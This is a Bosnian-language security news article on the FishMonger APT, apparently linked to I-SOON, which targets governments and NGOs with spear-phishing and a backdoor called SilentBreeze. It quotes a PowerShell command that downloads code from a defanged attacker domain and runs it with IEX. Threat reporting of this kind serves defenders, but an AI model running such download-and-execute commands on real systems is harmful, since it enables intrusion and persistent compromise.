More

    Kineski FishMonger APT kojim upravlja I‑SOON koji napada vladine subjekte i nevladine organizacije

    Nedavne istrage kibernetičke sigurnosti otkrile su sofisticiranog hakera nazvanog “FishMonger” koji djeluje pod okriljem I-SOON, kineske kompanije koja je navodno povezana s hakerskim operacijama koje sponzoriše država.

    Ova grupa za naprednu trajnu prijetnju (APT) sistematski cilja na vladine institucije i nevladine organizacije širom jugoistočne Azije i dijelova Evrope od najmanje 2021.

    Napadi pokazuju visok nivo sofisticiranosti, s pažljivo osmišljenim phishing kampanjama i prilagođenim malicioznim softverom dizajniranim da eksfiltriraju osjetljive diplomatske informacije i informacije vezane za politiku iz ciljanih organizacija.

    Početna analiza sugerira da su operacije FishMongera u skladu sa kineskim strateškim interesima, posebno fokusirajući se na subjekte uključene u teritorijalne sporove u Južnom kineskom moru i međunarodne grupe za zagovaranje ljudskih prava koje prate aktivnosti u regiji.

    Grupa održava uporan pristup ugroženim mrežama tokom dužeg perioda, često ostaje neotkriven mjesecima dok prikuplja kredencijale i osjetljive dokumente.

    ESET-ovi istraživači su identifikovali karakteristične obrasce u lancu napada FishMonger-a, uključujući upotrebu ubrizgavanja šablona u dokumente Microsoft Office-a i prilagođeni backdoor pod nazivom “SilentBreeze” koji uspostavlja komandne i kontrolne veze putem šifrovanih kanala.

    Ovaj APT koristi sofisticirane tehnike kontradetekcije, redovno modifikujući svoj skup alata kako bi izbjegao sigurnosna rješenja.

    Inicijalna infekcija obično počinje s spear-phishing emailovima koji sadrže maliciozne dokumente prilagođene organizaciji žrtve.

    Kada se otvore, ovi dokumenti iskorištavaju ranjivosti ili koriste društveni inženjering za izvođenje procesa infekcije u više faza.

    Imena FishMonger — I‑SOON članova (Izvor – Welivesecurity)

    E-poruka za krađu identiteta usmjerena na diplomatsko predstavništvo jugoistočne Azije s dokumentom koji navodno sadrži informacije o regionalnoj sigurnosti.

    Analiza SilentBreeze Backdoor-a

    SilentBreeze backdoor koristi složeni algoritam šifrovanja da prikrije svoj komandni i kontrolni promet.

    Nakon izvršenja, stvara postojanost kroz zakazani zadatak koji izvršava sljedeću PowerShell naredbu :-

    $wc = New-Object System.Net.WebClient;
    $wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36");
    $wc.DownloadString("hxxps://cdn-storage[.]cloud-service[.]site/updates.php") | IEX

    Ova komanda preuzima i izvršava dodatne korisne podatke iz napadačeve infrastrukture.

    Spyder loader (Izvor – Welivesecurity)

    Maliciozni softver zatim uspostavlja komunikaciju sa komandnim serverima, koji prikazuje obrazac mrežnog prometa koji je karakterističan za SilentBreeze infekcije.

    Infrastruktura grupe se u velikoj mjeri oslanja na kompromitovane web stranice trećih strana koje služe kao proksi za maskiranje pravih komandnih servera, čineći napore pripisivanja i uklanjanja posebno izazovnim za organizacije koje štite i istraživače kibernetičke sigurnosti koji prate njihove aktivnosti.

    Izvor: CyberSecurityNews

    Recent Articles

    spot_img

    Related Stories